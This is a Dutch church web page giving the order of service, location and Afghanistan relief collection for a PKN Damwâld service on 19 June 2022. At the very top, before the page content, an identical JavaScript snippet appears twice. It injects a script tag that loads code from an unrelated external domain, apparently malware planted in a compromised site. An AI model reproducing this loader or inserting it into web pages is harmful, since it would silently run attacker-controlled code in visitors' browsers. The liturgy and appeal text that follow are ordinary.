;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 19 juni 2022 14:00 uur - PKN Damwâld
zondag 19 juni 2022
14:00 uur

Kerkdienst zondag 19 juni 2022 14:00 uur

Informatie

Voorganger:Dhr. J.Y. van der Wal, Morra
Organist:Nienke v/d Heide Visser
Liturgie
Intochtslied : Ps. 123 : 1
Stil gebed, Woord van bemoediging & Groet
We zingen: Ps. 26 : 1, 3 en 5
Gebed
We lezen: Romeinen 8 : 18-30
We zingen: Nieuwe Liedboek 902 : 1, 3 en 4
Verkondiging .
We zingen: Nieuwe liedboek 675 : 1, 2
Gebed
We zingen: Elb. 170 : 1
Geloofsbelijdenis
We zingen: Elb. 170 : 2
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Collecte Kerk in Actie (project) (collectenr. 22063) Noodhulp Afghanistan.

Afghanistan staat aan de rand van een humanitaire ramp. Hongersnood dreigt voor ruim acht miljoen Afghanen. Kerk in Actie biedt, samen met lokale partners, noodhulp aan kwetsbare gezinnen. Door de ergste droogte sinds 27 jaar, de coronapandemie, de jarenlange oorlog en machtsovername door de Taliban is de economie ingestort en zijn de voedselprijzen torenhoog gestegen. Hongersnood dreigt voor ruim acht miljoen Afghanen. Meer dan drie miljoen mensen zijn ontheemd en op zoek naar veiligheid. Ze wonen in tenten en de armoede onder hen is groot: kinderen bedelen op straat en vrouwen verkopen hun kleren om dekens te kunnen kopen om ’s nachts de kinderen een beetje warmte te bieden.

Uitganscollecte: Bij de uitgang of via QR-code